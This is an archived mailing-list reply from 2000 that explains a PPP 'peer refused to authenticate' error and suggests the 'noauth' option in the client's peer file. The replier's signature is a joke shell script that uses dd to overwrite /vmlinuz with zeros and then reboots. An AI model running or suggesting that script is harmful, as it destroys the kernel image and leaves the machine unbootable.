On Thu, Jun 29, 2000 at 08:14:10PM +0530, Nagarjuna G. wrote: > After setting up the ppp server, when I try to connect to the server > ppp starts and immediately stops with the following error: peer refused to > authenticate. Any clues?
Dialin servers almost never will authenticate to the client (unless you have a WAN). Your client ppp setup apparently is asking the server to authenticate itself to the client. You'll have to turn that off. Did you use pppconfig for the client? If you want the server to authenticate itself to the client, then you'll have to configure it to do so (but probably not what you want). The pap or chap authentication of the server will refuse connections from clients that don't authenticate themselves to the server (which is probably what you want) or when authentication fails (bad user/password pair). On your dialup, your /etc/ppp/peers/"provider" file should have an entry of "noauth" so it doesn't ask the server to authenticate itself. > Jun 29 20:10:32 hbcse pppd[31618]: rcvd [LCP EchoReq id=0x0 magic=0x1d8b13a] > Jun 29 20:10:32 hbcse pppd[31618]: sent [LCP EchoRep id=0x0 magic=0x2afb0af] > Jun 29 20:10:32 hbcse pppd[31618]: rcvd [LCP TermReq id=0x3 "peer refused to > authenticate"] > Jun 29 20:10:32 hbcse pppd[31618]: LCP terminated by peer (peer refused to > authenticate) > Jun 29 20:10:32 hbcse pppd[31618]: sent [LCP TermAck id=0x3] > Jun 29 20:10:33 hbcse pppd[31618]: Modem hangup > Jun 29 20:10:33 hbcse pppd[31618]: Connection terminated. > Jun 29 20:10:34 hbcse pppd[31618]: Exit. > Jun 29 20:12:00 hbcse /USR/SBIN/CRON[316 > > > Nagarjuna > -------------------------------------------------------------------------- > Nagarjuna G; Homi Bhabha Centre for Science Education, TIFR, Mumbai. INDIA > -------------------------------------------------------------------------- > > > -- > Unsubscribe? mail -s unsubscribe [EMAIL PROTECTED] < /dev/null > > -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now